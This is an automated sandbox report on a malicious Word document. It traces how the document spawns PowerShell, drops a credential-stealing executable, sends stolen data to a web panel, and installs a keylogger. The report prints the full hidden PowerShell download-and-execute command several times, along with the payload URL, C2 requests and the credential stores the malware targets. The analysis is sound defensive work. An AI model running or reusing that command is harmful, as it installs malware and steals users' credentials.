Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:50178
Start time:22:28:35
Joe Sandbox Product:CloudBasic
Start date:13.03.2018
Overall analysis duration:0h 5m 15s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:BjgOdvod71.000 (renamed file extension from 000 to doc)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.phis.spyw.troj.winDOC@7/10@3/3
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 0
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe, OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, wxkh.exe, wxkh.exe


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exevirustotal: Detection: 23%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: BjgOdvod7.docvirustotal: Detection: 38%Perma Link

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeWindow created: window name: CLIPBRDWNDCLASS
Installs a global keyboard hookShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wxkh.exe

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: peadarking.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49170 -> 78.137.164.80:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49170 -> 78.137.164.80:80
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /blackgate.ie/bless/kccInvoice.exe HTTP/1.1User-Agent: USR-KLHost: peadarking.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: peadarking.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continueConnection: Keep-Alive
Urls found in memory or binary dataShow sources
Source: wxkh.exeString found in binary or memory: file://
Source: wxkh.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: wxkh.exe, enterprisesec.config.cch.new.7.dr, security.config.cch.new.7.drString found in binary or memory: file:///C:/Users/Sam
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwe
Source: powershell.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/AppData/Roaming/wxkh.exe
Source: powershell.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/AppData/Roaming/wxkh.exeb
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.doc
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.doc4
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.docX
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.docft2
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.dock
Source: powershell.exe, wxkh.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microso%
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microsoft.PowerShell.Commands.Management.re
Source: wxkh.exeString found in binary or memory: file:///C:/Windows/assemblp
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: WINWORD.EXEString found in binary or memory: ftp://
Source: powershell.exe, wxkh.exeString found in binary or memory: http://
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.org
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.org/
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.orgx&
Source: powershell.exeString found in binary or memory: http://jav
Source: powershell.exeString found in binary or memory: http://java.com/
Source: powershell.exeString found in binary or memory: http://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exeString found in binary or memory: http://peadarkin
Source: powershell.exeString found in binary or memory: http://peadarkinX
Source: powershell.exe, wxkh.exeString found in binary or memory: http://peadarking.com
Source: powershell.exeString found in binary or memory: http://peadarking.com/blac
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/
Source: wxkh.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/WebPanel/api.php
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/kccInvoice.exe
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/kccInvoice.exet
Source: powershell.exe, wxkh.exeString found in binary or memory: http://peadarking.comx&
Source: WINWORD.EXEString found in binary or memory: http://pur
Source: WINWORD.EXEString found in binary or memory: http://purl
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.com
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 13 Mar 2018 21:29:23 GMTServer: Apache/2.4.29 (cPanel) OpenSSL/1.0.2n mod_bwlimited/1.4Last-Modified: Tue, 13 Mar 2018 01:00:08 GMTETag: "1001f37-46e00-56740c7a6b340"Accept-Ranges: bytesContent-Length: 290304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac 3e 32 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 64 04 00 00 08 00 00 00 00 00 00 ae 83 04 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 02 00 00 00 00 00 00 02 00 40 85
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 216.146.43.70
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: DYNDNS-DynamicNetworkServicesIncUS
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 274Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 274Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 240Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 960Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 142070Expect: 100-continue
Domain name seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDomain Name: checkip.dyndns.org
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: checkip.dyndns.org
Source: unknownDNS query: name: checkip.dyndns.org

Stealing of Sensitive Information:

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\Software\Paltalk
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wxkh.exe
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force

Data Obfuscation:

barindex
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 7.8914501267
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

System Summary:

barindex
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Document has a 'comments' value indicative for goodwareShow sources
Source: BjgOdvod7.docInitial sample: OLE summary comments = Aenean toCurabitur fermentum nisl lr pulvinar tortor quis metus tempus a. Praesent quis aliquet odio. ibero, sed varius toret rhoncus in vel purus.
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: wxkh.exe
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: WINWORD.EXE
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: wxkh.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdb* source: powershell.exe
Document has a 'keywords' value indicative for goodwareShow sources
Source: BjgOdvod7.docInitial sample: OLE summary keywords = x, , elit, ornare,a molestieMauris, condimentum, mi e vitae
Document has a 'bytes' value indicative for goodwareShow sources
Source: BjgOdvod7.docInitial sample: OLE document summary bytes = 11000
Document has a 'subject' value indicative for goodwareShow sources
Source: BjgOdvod7.docInitial sample: OLE summary subject = 3ULGM14X
.NET source code contains calls to encryption/decryption functionsShow sources
Source: 7.2.wxkh.exe.600000.0.raw.unpack, A/Q.csCryptographic APIs: 'TransformBlock', 'TransformFinalBlock', 'CreateDecryptor'
Binary contains paths to development resourcesShow sources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.phis.spyw.troj.winDOC@7/10@3/3
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$gOdvod71.doc
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRFDF6.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: BjgOdvod7.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: BjgOdvod7.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3Eg....#........3Eg......?.L|Dg.......j 'Jg...j.'v)L|Dg.............7Eg......Dg..?.(............... 'Jg..Dg....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#..............v...................v..0.....H...\...(.......................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.0.....H...\...(......................./..........."...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/..............v...................v..0.....H...\...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;...(...h......v...................v..0.....H...\...(...V...................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;..............v...................v..0.....H...\...(...s...................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G...(...h......v...................v..0.....H...\...........................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G..............v...................v..0.....H...\...........................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S...(...h......v...................v..0.....H...\...........................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S..............v...................v..0.....H...\...........................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_...(...h......v...................v..0.....H...\......."..................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_..............v...................v..0.....H...\.......=..................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k...(...h......v...................v..0.....H...\.......e...................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k..............v...................v..0.....H...\...........................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w...(...h......v...................v..0.....H...\...........................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w..............v...................v..0.....H...\...........................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... . . .n.g.E.x.c.e.p.t.i.o.n....v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................(...h......v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\.......I...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... . . ...C.o.m.m.a.n.d.s...T.e.s.t.P.a.t.h.C.o.m.m.a.n.d.............................8...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... ...h......v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Users\user\AppData\Roaming\wxkh.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: BjgOdvod7.docVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\BjgOdvod71.doc
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: unknownProcess created: C:\Users\user\AppData\Roaming\wxkh.exe 'C:\Users\user\AppData\Roaming\wxkh.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\wxkh.exe C:\Users\user\AppData\Roaming\wxkh.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wxkh.exe 'C:\Users\user\AppData\Roaming\wxkh.exe'
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess created: C:\Users\user\AppData\Roaming\wxkh.exe C:\Users\user\AppData\Roaming\wxkh.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
